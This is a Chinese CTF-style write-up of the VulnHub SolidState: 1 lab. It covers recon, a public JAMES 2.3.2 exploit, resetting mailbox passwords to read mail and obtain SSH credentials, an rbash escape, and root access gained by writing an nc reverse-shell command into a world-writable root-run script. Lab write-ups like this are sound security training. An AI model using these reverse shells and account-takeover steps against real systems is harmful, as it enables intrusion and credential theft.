靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

admin 2025年6月7日13:24:56评论2 views字数 2805阅读9分21秒阅读模式

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

一、信息收集

arp-can -l
扫描同网段,这里192.168.122.195就是我们打开的靶机了
靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

二、指纹扫描

nmap -sS -sV 192.168.122.195
nmap -p- -sV -A 192.168.122.195
whatweb -v 192.168.122.195

1、扫描一下,nmap -sS -sV 192.168.122.195

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

110/tcp  open  pop3        JAMES pop3d 2.3.2

119/tcp  open  nntp        JAMES nntpd (posting ok)

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

2、nmap -p- -sV -A 192.168.122.195

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp  open  smtp    JAMES smtpd 2.3.2
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)

3、whatweb 192.168.122.195靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

三、我们先看一下80端口,dirb和dirsearch在后台扫着

这里80端口打不开,可能是网络问题也可能是无法打开

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root我们扫出来的网页。靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

四、还是看一下扫出来的页面

这里扫出来一个网页,估计能存在注入啥的,这是一个邮件系统靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里貌似有一个邮箱靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

我们f12一下,看到后面还有几个js文件

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root
靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

四、找找EXP

1、step1

说实话,这几个网页感觉不像是攻击点,我们换个端口,在之前扫描时候好像是有一个远程命令执行漏洞靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root就这里,一开始是瞟了一眼,记得有这个Remote,版本应该比较老,去github或者浏览器上搜索一下靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到rootExp撞脸上了,下载试试,或者去searchspliot找一下也可以,msf不建议,考试就一次机会靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里还是挺方便的,找了一下使用方法靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root我们下载下来使用一下 这里使用了,但是我们不知道密码,只有账户,这个我们先放一边靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

2、step2

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里很奇怪,决定换个方向 在一个文章上找了一个师傅说直接用nc就能连接靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里有几个用户,先把密码改成root,然后使用nc连接一下110端口(邮箱端口)靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里我是第一次使用这个nc连接110端口,命令语句是

nc -nC 192.168.122.196 110
user james
pass root
这个是我们之前找到的账号和自己设置的密码
使用retr命令下载文件
这里我也是第一次了解这个功能命令,retr和stor是ftp中下载上命令,可以针对文件和目录

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这是我们得到的邮件,大概是老板让他给新员工发送个临时账户之类的信息,我们看看别人的邮箱靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里mindy邮箱报了啊,账号和密码爆出来了靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

username: mindy
pass: P@55W0rd1!2@
这是我们找到的新员工账户和密码,猜测用于ssh登录

3、step3

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里是ssh登录,可以使用我们的账户密码进行登录靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root我们cat /etc/passwd,看到了mindy用户是不完整的shell,可以利用/bin/rbash/进行反向shell提权。靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里也是用了我们一开始下载的exp,没想到是在这儿用的。

重点:提权方法(1)

1、开python环境
python -m http.server 80
开python环境,因为我们后续要用python

![](https://files.mdpython -m http.server 80nice.com/user/92278/dceada32-49ea-4e88-87e6-c989b5531781.png)

2、开启监听
nc -nvlp 6666
nc真的是打靶的瑞士军刀,确实好用
3、执行exp

这里exp有两个版本,选哪个都可以,我选择的是50437的,就是不用vi进去修改,在终端就可以配置pyload

4、ssh连接
ssh [email protected]

到这里我们就已经登录了mindy的账户了靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

5、抽象提权

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里显示了我们的根目录在opt,我们看一下

靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里是有一个所有人都能写入的文件,且是root组的文件,写了一个tmp.py的临时文件,777也就是任何人都能执行这个脚本,我们插入一个反弹shell,这里注意我们要插入shell要让root运行,而mindy账户运行时反弹mindy的shell

echo'import os; os.system("/bin/nc 192.168.122.187 666 -e /bin/bash")' > /opt/tmp.py

这波我直接上演碟中谍之谁的nc -vnlp,这里是很抽象提权

6、补充

然后我们再在kali开一个终端开一个监听,就是让mindy丢一个反弹shell到tmp.py里面,然后我们再开一个终端,这个tmp脚本会自动处理文件,然后反连我们。这波我直呼卧槽。靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root这里猜测一个这个txt里面应该是个flag,打ctf碰到这东西可爽了靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

技术总结:说实话,最后提权用nc有点绕、抽象,但是相比之前打靶机确实有很大进步,得把反弹shell语法记住,这个很关键,nc也得再精进一点,这东西是真好用,砍瓜切菜很顶。

心得总结:这个靶机打的很爽,从提权第一步到执行完exp全是个人摸索,中途也很想看答案或者别的师傅,但还是硬着头皮坐了下去,没想到是成功了,现在是23:51,不然我一定大喊一声牛B。打靶越来越顺了,还行,今天和朋友去吃烤肉还聊考研和找工作这个事了,但是很多同学都想考研,想站的更高,但我却认为社会也是很好的老师,或许我这样一个另类也能创造什么样的成绩,我的学校师哥师姐也没有走红队、渗透的,一路摸索说实话,有点慌但还是有着莫名的自信觉得自己可以走这条路,也许走那条路没有对错。ok今天靶机到这里了,好好享受大学、好好享受生活、好好享受学渗透的这个过程吧,明天也要天天开心(虽然打靶有时候会很痛苦).

后续我也会出更多打靶文章,希望大家关注!谢谢。

原文始发于微信公众号(泷羽Sec-朝阳):靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日13:24:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到roothttps://cn-sec.com/archives/3792189.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息